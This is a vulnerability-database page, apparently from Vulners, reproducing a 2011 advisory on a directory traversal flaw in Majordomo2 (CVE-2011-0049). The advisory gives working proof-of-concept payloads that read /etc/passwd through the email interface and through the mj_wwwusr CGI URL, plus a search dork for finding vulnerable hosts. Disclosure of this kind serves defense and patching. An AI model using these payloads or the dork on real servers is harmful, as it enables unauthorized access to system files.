Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Majordomo2 20110121 Directory Traversal

🗓️ 02 Feb 2011 00:00:00Reported by Michael BrooksType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

Majordomo2 20110121 Directory Traversal vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Majordomo2 - Directory Traversal (SMTP/HTTP)
3 Feb 201100:00
zdt
Circl		CVE-2011-0049
3 Feb 201100:00
circl
CVE		CVE-2011-0049
4 Feb 201100:00
cve
Cvelist		CVE-2011-0049
4 Feb 201100:00
cvelist
d2		DSquare Exploit Pack: D2SEC_MAJORDOMO
4 Feb 201101:00
d2
Dsquare		Majordomo 2 File Disclosure
27 Apr 201200:00
dsquare
Exploit DB		Majordomo2 - 'SMTP/HTTP' Directory Traversal
3 Feb 201100:00
exploitdb
exploitpack		Majordomo2 - SMTPHTTP Directory Traversal
3 Feb 201100:00
exploitpack
Tenable Nessus		Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access
16 Feb 201100:00
nessus
Metasploit		Majordomo2 _list_file_get() Directory Traversal
12 Mar 201116:38
metasploit
Rows per page
`Original Advisory: https://sitewat.ch/en/Advisory/View/1  
Credit: Michael Brooks (https://sitewat.ch)  
Vulnerability: Directory Traversal  
Software: Majordomo2  
Identifier:CVE-2011-0049  
Vendor: http://www.mj2.org/  
Affected Build: 20110121 and prior  
Download:  
http://ftp.mj2.org/pub/mj2/snapshots/2011-01/majordomo-20110121.tar.gz  
Google dork:inurl:mj_wwwusr  
  
Special thanks to Dave Miller, Reed Loden and the rest of the Mozilla  
security team for handling the issue.  
  
This vulnerability is exploitable via ALL of Majordomo2's interfaces.  
*Including  
e-mail*. Send an email to majordomo's mail interface (for example:  
[email protected]) with the body of the message as follows:  
help ../../../../../../../../../../../../../etc/passwd  
  
I'll give you one guess as to the contents of the response email ;).  
  
PoC for HTTP:  
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2011 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.90582
majordomo2directory traversalcve-2011-0049exploitableemail interfacehttp interfacevulnerabilitysecurity advisorysoftwarevendoraffected builddownloadgoogle dorkpoc
42